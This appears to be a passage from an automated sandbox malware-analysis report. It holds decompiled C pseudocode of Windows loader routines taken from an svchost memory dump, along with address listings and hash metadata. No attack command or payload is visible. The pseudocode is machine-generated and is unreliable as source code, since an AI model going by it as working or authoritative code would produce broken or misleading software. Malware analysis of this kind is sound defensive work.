											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3b18608);
												E03A6B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3b16904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3b16e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E03A3FFB0(_t198, _t240, 0x3b18608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E03A600C2(0x3b18608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                          0x03a520a0
                                          0x03a520a8
                                          0x03a520ad
                                          0x03a520b3
                                          0x03a520b8
                                          0x03a520c2
                                          0x03a520c7
                                          0x03a520cb
                                          0x03a520d2
                                          0x03a52263
                                          0x03a52266
                                          0x03a95836
                                          0x03a95836
                                          0x00000000
                                          0x03a5226c
                                          0x03a5226c
                                          0x03a52270
                                          0x03a52274
                                          0x03a520e2
                                          0x03a520e2
                                          0x03a520e6
                                          0x03a520ee
                                          0x03a957dc
                                          0x03a957de
                                          0x03a957ec
                                          0x03a957ec
                                          0x03a957f1
                                          0x03a957f3
                                          0x03a957f8
                                          0x00000000
                                          0x03a957f8
                                          0x03a957e0
                                          0x03a957e4
                                          0x03a957ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a957ea
                                          0x03a520f4
                                          0x03a520f4
                                          0x03a520f8
                                          0x03a520f8
                                          0x03a520fc
                                          0x03a52100
                                          0x03a52106
                                          0x03a52201
                                          0x03a52206
                                          0x03a5220b
                                          0x03a5220e
                                          0x03a522a9
                                          0x03a522ac
                                          0x00000000
                                          0x00000000
                                          0x03a522b2
                                          0x03a522b5
                                          0x03a95801
                                          0x03a95806
                                          0x00000000
                                          0x00000000
                                          0x03a95810
                                          0x03a95815
                                          0x03a95818
                                          0x00000000
                                          0x00000000
                                          0x03a9581e
                                          0x03a522bb
                                          0x03a522bb
                                          0x03a52218
                                          0x03a52218
                                          0x03a5221c
                                          0x03a52220
                                          0x03a52222
                                          0x03a522c2
                                          0x03a522c4
                                          0x03a522dc
                                          0x03a522dc
                                          0x03a522e1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a522e7
                                          0x03a522c8
                                          0x03a522cd
                                          0x03a522d3
                                          0x03a522d6
                                          0x03a95823
                                          0x03a95825
                                          0x03a95827
                                          0x00000000
                                          0x00000000
                                          0x03a9582d
                                          0x00000000
                                          0x03a9582d
                                          0x00000000
                                          0x03a52228
                                          0x03a52228
                                          0x00000000
                                          0x03a52228
                                          0x03a52222
                                          0x03a52214
                                          0x03a52214
                                          0x00000000
                                          0x03a52114
                                          0x03a52114
                                          0x03a52114
                                          0x03a5211a
                                          0x03a5211c
                                          0x03a52348
                                          0x03a5234d
                                          0x03a95840
                                          0x03a95845
                                          0x03a95848
                                          0x03a9584e
                                          0x03a9584e
                                          0x03a95848
                                          0x03a52353
                                          0x03a52355
                                          0x03a52388
                                          0x03a52388
                                          0x03a52368
                                          0x03a5236a
                                          0x03a5236c
                                          0x03a5238f
                                          0x00000000
                                          0x03a5236e
                                          0x03a5236e
                                          0x03a5218e
                                          0x03a5218e
                                          0x03a52191
                                          0x03a52195
                                          0x03a95a03
                                          0x03a95a06
                                          0x03a95a0c
                                          0x03a95a0f
                                          0x03a95a11
                                          0x03a95a13
                                          0x03a95a13
                                          0x03a95a19
                                          0x03a95a1f
                                          0x00000000
                                          0x03a5219b
                                          0x03a5219b
                                          0x03a521a0
                                          0x03a52282
                                          0x03a52284
                                          0x03a52284
                                          0x03a52284
                                          0x03a52284
                                          0x03a521a6
                                          0x03a521a9
                                          0x03a521ac
                                          0x03a521ae
                                          0x03a521b3
                                          0x03a5228b
                                          0x03a52290
                                          0x03a52379
                                          0x03a52296
                                          0x03a52298
                                          0x03a52298
                                          0x03a52290
                                          0x03a521b9
                                          0x03a521be
                                          0x03a522a2
                                          0x03a522a2
                                          0x03a521c4
                                          0x03a521c8
                                          0x03a521cc
                                          0x03a521d0
                                          0x03a521d4
                                          0x03a521de
                                          0x03a521e3
                                          0x03a95a29
                                          0x03a95a2c
                                          0x00000000
                                          0x00000000
                                          0x03a95a3b
                                          0x00000000
                                          0x03a521e9
                                          0x03a521e9
                                          0x03a521e9
                                          0x03a521ee
                                          0x03a521f1
                                          0x03a95a45
                                          0x03a95a4b
                                          0x03a95a52
                                          0x03a95a58
                                          0x03a95a5d
                                          0x03a95a5f
                                          0x03a95a71
                                          0x03a95a61
                                          0x03a95a6a
                                          0x03a95a6a
                                          0x03a95a76
                                          0x03a95a79
                                          0x03a95a7f
                                          0x03a95a83
                                          0x03a95a85
                                          0x03a95a87
                                          0x03a95a87
                                          0x03a95a8c
                                          0x03a95a91
                                          0x03a95a97
                                          0x03a95a9f
                                          0x03a95aa0
                                          0x03a95aa1
                                          0x03a95aa6
                                          0x03a95aab
                                          0x03a95ab1
                                          0x03a95ab3
                                          0x03a95ab9
                                          0x03a95aca
                                          0x03a95ad4
                                          0x03a95ad4
                                          0x03a95ade
                                          0x03a95ade
                                          0x03a95aab
                                          0x03a95a79
                                          0x03a95a52
                                          0x03a521f7
                                          0x03a521f9
                                          0x03a521fe
                                          0x03a521fe
                                          0x03a521e3
                                          0x03a52195
                                          0x03a5236c
                                          0x03a52122
                                          0x03a52122
                                          0x03a52124
                                          0x03a52231
                                          0x03a52236
                                          0x03a52236
                                          0x03a52238
                                          0x03a52238
                                          0x03a52240
                                          0x03a52242
                                          0x03a52244
                                          0x03a959fc
                                          0x03a5218c
                                          0x03a5218c
                                          0x00000000
                                          0x03a5218c
                                          0x03a5224a
                                          0x03a5224f
                                          0x03a52256
                                          0x03a52304
                                          0x03a52309
                                          0x03a5230f
                                          0x03a5231e
                                          0x03a5231e
                                          0x03a5231e
                                          0x03a52320
                                          0x03a52325
                                          0x03a5232a
                                          0x03a5232c
                                          0x03a5233e
                                          0x03a5233e
                                          0x00000000
                                          0x03a5232c
                                          0x03a52311
                                          0x03a52317
                                          0x03a5231a
                                          0x03a5231c
                                          0x03a52380
                                          0x03a52380
                                          0x03a52380
                                          0x03a52384
                                          0x00000000
                                          0x00000000
                                          0x03a52386
                                          0x00000000
                                          0x03a5231c
                                          0x03a5225c
                                          0x03a5225c
                                          0x00000000
                                          0x03a5225c
                                          0x03a5212a
                                          0x03a52134
                                          0x03a52138
                                          0x03a5213d
                                          0x03a95858
                                          0x03a95863
                                          0x03a95863
                                          0x03a95867
                                          0x03a9586a
                                          0x00000000
                                          0x00000000
                                          0x03a9586c
                                          0x03a9586c
                                          0x03a95871
                                          0x03a95875
                                          0x03a95877
                                          0x03a95997
                                          0x03a9599c
                                          0x03a959a1
                                          0x03a959a7
                                          0x03a959a7
                                          0x00000000
                                          0x03a959a7
                                          0x03a9587d
                                          0x00000000
                                          0x03a9588b
                                          0x03a9588b
                                          0x03a95890
                                          0x03a95892
                                          0x03a95894
                                          0x03a95899
                                          0x03a9589b
                                          0x03a958a0
                                          0x03a958a0
                                          0x03a958aa
                                          0x03a958b2
                                          0x03a958b6
                                          0x03a958be
                                          0x03a958c6
                                          0x03a958c9
                                          0x03a9590d
                                          0x03a95917
                                          0x03a9591a
                                          0x03a9591c
                                          0x03a95920
                                          0x03a95928
                                          0x03a9592a
                                          0x03a9592c
                                          0x03a9592e
                                          0x03a9592e
                                          0x03a958cb
                                          0x03a958cd
                                          0x03a958d8
                                          0x03a958e0
                                          0x03a958f4
                                          0x03a958fe
                                          0x03a958fe
                                          0x03a9593a
                                          0x03a9593e
                                          0x03a95940
                                          0x03a95942
                                          0x00000000
                                          0x03a95944
                                          0x03a95944
                                          0x03a95949
                                          0x03a9594e
                                          0x03a9594e
                                          0x03a95953
                                          0x03a9595b
                                          0x03a95976
                                          0x03a95976
                                          0x03a9597a
                                          0x03a9597f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a95981
                                          0x03a95981
                                          0x03a95981
                                          0x03a95983
                                          0x03a95988
                                          0x03a9598d
                                          0x03a95991
                                          0x03a95991
                                          0x00000000
                                          0x03a9595d
                                          0x03a9595d
                                          0x03a95963
                                          0x03a95965
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a95967
                                          0x03a95967
                                          0x03a9596b
                                          0x03a9596d
                                          0x00000000
                                          0x00000000
                                          0x03a9596f
                                          0x03a95971
                                          0x03a95971
                                          0x03a95974
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a95974
                                          0x00000000
                                          0x03a95967
                                          0x03a9595b
                                          0x03a95942
                                          0x03a95863
                                          0x03a52143
                                          0x03a52143
                                          0x03a52149
                                          0x03a5214f
                                          0x03a522f1
                                          0x03a522f6
                                          0x00000000
                                          0x03a52173
                                          0x03a52173
                                          0x03a5217d
                                          0x03a52181
                                          0x03a52186
                                          0x03a959ae
                                          0x03a959b2
                                          0x03a959b5
                                          0x03a959b7
                                          0x03a959ba
                                          0x03a959cd
                                          0x03a959d1
                                          0x03a959d5
                                          0x03a959d9
                                          0x03a959db
                                          0x00000000
                                          0x00000000
                                          0x03a959dd
                                          0x03a959dd
                                          0x03a959e1
                                          0x03a959e4
                                          0x03a959e7
                                          0x03a959ee
                                          0x03a959ee
                                          0x03a959f3
                                          0x03a959f3
                                          0x00000000
                                          0x03a52186
                                          0x03a5214f
                                          0x03a52106
                                          0x03a52266
                                          0x03a520d8
                                          0x03a520da
                                          0x03a520e0
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4ec9d10f638bad7222c7ae4adac26cefbca722a3a62e446b4bb5714074ac20b
                                          • Instruction ID: eea943791643ba1440c39cdca5acaf36367d83f590f39019c31c3cf4d2a01df8
                                          • Opcode Fuzzy Hash: b4ec9d10f638bad7222c7ae4adac26cefbca722a3a62e446b4bb5714074ac20b
                                          • Instruction Fuzzy Hash: 71F1C335A083459FEB26CB28C54176BB7E9BF86324F08896FFC959B250D734D841CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A3D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E03A3D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x3b1d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03A36600(0x3b152d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3b17b9c; // 0x0
							_t281 = L03A44620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E03A6F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3b17b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x3b17b8c; // 0x34035e8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E03A42280(_t200, 0x3b184d8);
									_t277 =  *0x3b185f4; // 0x3403ad8
									_t351 =  *0x3b185f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x3403a70
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E03A3FFB0(_t287, _t353, 0x3b184d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E03A7CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03A36600(0x3b152d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03A37926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x3b1b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E03AAE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3b18472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x3b1b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x3b1b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03A42280(_t250, 0x3b184d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03A63898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E03A3FFB0(_t293, _t353, 0x3b184d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E03A637F5(_t353, 0);
																}
																E03A60413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03A59B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E03A502D6(_t174);
																}
																L03A477F0( *0x3b17b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E03A5C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L03A3EC7F(_t353);
										L03A519B8(_t287, 0, _t353, 0);
										_t200 = E03A2F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x3b1b2f8 |  *0x3b1b2fc) == 0 || ( *0x3b1b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E03A6B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x3b1b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E03AD6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E03AD6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E03A3E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L03A3EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E03A69730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E03A3E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L03A38F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03A63C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                          0x03a3d5f2
                                          0x03a3d5f5
                                          0x03a3d5f5
                                          0x03a3d5fd
                                          0x03a3d600
                                          0x03a3d60a
                                          0x03a3d60d
                                          0x03a3d617
                                          0x03a3d61d
                                          0x03a3d627
                                          0x03a3d62e
                                          0x03a3d911
                                          0x03a3d913
                                          0x00000000
                                          0x03a3d919
                                          0x03a3d919
                                          0x03a3d919
                                          0x03a3d634
                                          0x03a3d634
                                          0x03a3d634
                                          0x03a3d634
                                          0x03a3d640
                                          0x03a3d8bf
                                          0x00000000
                                          0x03a3d646
                                          0x03a3d646
                                          0x03a3d64d
                                          0x03a3d652
                                          0x03a8b2fc
                                          0x03a8b2fc
                                          0x03a8b302
                                          0x03a8b33b
                                          0x03a8b341
                                          0x00000000
                                          0x03a8b304
                                          0x03a8b304
                                          0x03a8b319
                                          0x03a8b31e
                                          0x03a8b324
                                          0x03a8b326
                                          0x03a8b332
                                          0x03a8b347
                                          0x03a8b34c
                                          0x03a8b351
                                          0x03a8b35a
                                          0x00000000
                                          0x03a8b328
                                          0x03a8b328
                                          0x00000000
                                          0x03a8b328
                                          0x03a8b326
                                          0x03a3d658
                                          0x03a3d658
                                          0x03a3d65b
                                          0x03a3d665
                                          0x00000000
                                          0x03a3d66b
                                          0x03a3d66b
                                          0x03a3d66b
                                          0x03a3d66b
                                          0x03a3d66d
                                          0x03a3d672
                                          0x03a3d67a
                                          0x00000000
                                          0x00000000
                                          0x03a3d680
                                          0x03a3d686
